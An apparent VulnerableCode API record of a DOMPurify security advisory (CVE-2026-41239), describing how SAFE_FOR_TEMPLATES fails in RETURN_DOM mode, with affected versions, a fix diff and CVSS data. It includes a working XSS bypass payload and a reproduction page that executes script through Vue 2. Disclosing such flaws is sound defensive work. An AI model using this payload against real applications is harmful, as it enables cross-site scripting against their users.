Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/354051?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/354051?format=api", "vulnerability_id": "VCID-8y7q-v1h7-b7hd", "summary": "DOMPurify has a SAFE_FOR_TEMPLATES bypass in RETURN_DOM mode\n## Summary\n\n| Field | Value |\n|:------|:------|\n| **Severity** | Medium |\n| **Affected** | DOMPurify `main` at [`883ac15`](https://github.com/cure53/DOMPurify/tree/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6), introduced in v1.0.10 ([`7fc196db`](https://github.com/cure53/DOMPurify/commit/7fc196db0b42a0c360262dba0cc39c9c91bfe1ec)) |\n\n`SAFE_FOR_TEMPLATES` strips `{{...}}` expressions from untrusted HTML. This works in string mode but not with `RETURN_DOM` or `RETURN_DOM_FRAGMENT`, allowing XSS via template-evaluating frameworks like Vue 2.\n\n## Technical Details\n\nDOMPurify strips template expressions in two passes:\n\n1. **Per-node** — each text node is checked during the tree walk ([`purify.ts:1179-1191`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1179-L1191)):\n\n```js\n// pass #1: runs on every text node during tree walk\nif (SAFE_FOR_TEMPLATES && currentNode.nodeType === NODE_TYPE.text) {\n content = currentNode.textContent;\n content = content.replace(MUSTACHE_EXPR, ' '); // {{...}} -> ' '\n content = content.replace(ERB_EXPR, ' '); // <%...%> -> ' '\n content = content.replace(TMPLIT_EXPR, ' '); // ${... -> ' '\n currentNode.textContent = content;\n}\n```\n\n2. **Final string scrub** — after serialization, the full HTML string is scrubbed again ([`purify.ts:1679-1683`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1679-L1683)). This is the safety net that catches expressions that only form after the DOM settles.\n\nThe `RETURN_DOM` path returns before pass #2 ever runs ([`purify.ts:1637-1661`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1637-L1661)):\n\n```js\n// purify.ts (simplified)\n\nif (RETURN_DOM) {\n // ... build returnNode ...\n return returnNode; // <-- exits here, pass #2 never runs\n}\n\n// pass #2: only reached by string-mode callers\nif (SAFE_FOR_TEMPLATES) {\n serializedHTML = serializedHTML.replace(MUSTACHE_EXPR, ' ');\n}\nreturn serializedHTML;\n```\n\nThe payload `{<foo></foo>{constructor.constructor('alert(1)')()}<foo></foo>}` exploits this:\n\n1. Parser creates: `TEXT(\"{\")` → `<foo>` → `TEXT(\"{payload}\")` → `<foo>` → `TEXT(\"}\")` — no single node contains `{{`, so pass #1 misses it\n2. `<foo>` is not allowed, so DOMPurify removes it but keeps surrounding text\n3. The three text nodes are now adjacent — `.outerHTML` reads them as `{{payload}}`, which Vue 2 compiles and executes\n\n## Reproduce\n\nOpen the following html in any browser and `alert(1)` pops up.\n\n```html\n<!DOCTYPE html>\n<html>\n\n<body>\n <script src=\"https://cdn.jsdelivr.net/npm/dompurify@3.3.3/dist/purify.min.js\"></script>\n <script src=\"https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.min.js\"></script>\n <script>\n var dirty = '<div id=\"app\">{<foo></foo>{constructor.constructor(\"alert(1)\")()}<foo></foo>}</div>';\n var dom = DOMPurify.sanitize(dirty, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true });\n document.body.appendChild(dom.firstChild);\n new Vue({ el: '#app' });\n </script>\n</body>\n\n</html>\n```\n\n## Impact\n\nAny application that sanitizes attacker-controlled HTML with `SAFE_FOR_TEMPLATES: true` and `RETURN_DOM: true` (or `RETURN_DOM_FRAGMENT: true`), then mounts the result into a template-evaluating framework, is vulnerable to XSS.\n\n## Recommendations\n\n### Fix\n\n`normalize()` merges the split text nodes, then the same regex from the string path catches the expression. Placed before the fragment logic, this fixes both `RETURN_DOM` and `RETURN_DOM_FRAGMENT`.\n\n```diff\n if (RETURN_DOM) {\n+ if (SAFE_FOR_TEMPLATES) {\n+ body.normalize();\n+ let html = body.innerHTML;\n+ arrayForEach([MUSTACHE_EXPR, ERB_EXPR, TMPLIT_EXPR], (expr: RegExp) => {\n+ html = stringReplace(html, expr, ' ');\n+ });\n+ body.innerHTML = html;\n+ }\n+\n if (RETURN_DOM_FRAGMENT) {\n returnNode = createDocumentFragment.call(body.ownerDocument);\n```", "aliases": [ { "alias": "CVE-2026-41239" }, { "alias": "GHSA-crv5-9vww-q3g8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1067228?format=api", "purl": "pkg:npm/dompurify@3.4.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/193705?format=api", "purl": "pkg:npm/dompurify@1.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-8y7q-v1h7-b7hd" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.10" } ], "references": [ { "reference_url": "https://github.com/cure53/DOMPurify", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8" }, { "reference_url": "https://github.com/advisories/GHSA-crv5-9vww-q3g8", "reference_id": "GHSA-crv5-9vww-q3g8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-crv5-9vww-q3g8" } ], "weaknesses": [ { "cwe_id": 1289, "name": "Improper Validation of Unsafe Equivalence in Input", "description": "The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value." }, { "cwe_id": 79, "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "description": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users." } ], "exploits": [], "severity_range_score": "4.0 - 6.9", "exploitability": null, "weighted_severity": null, "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8y7q-v1h7-b7hd" }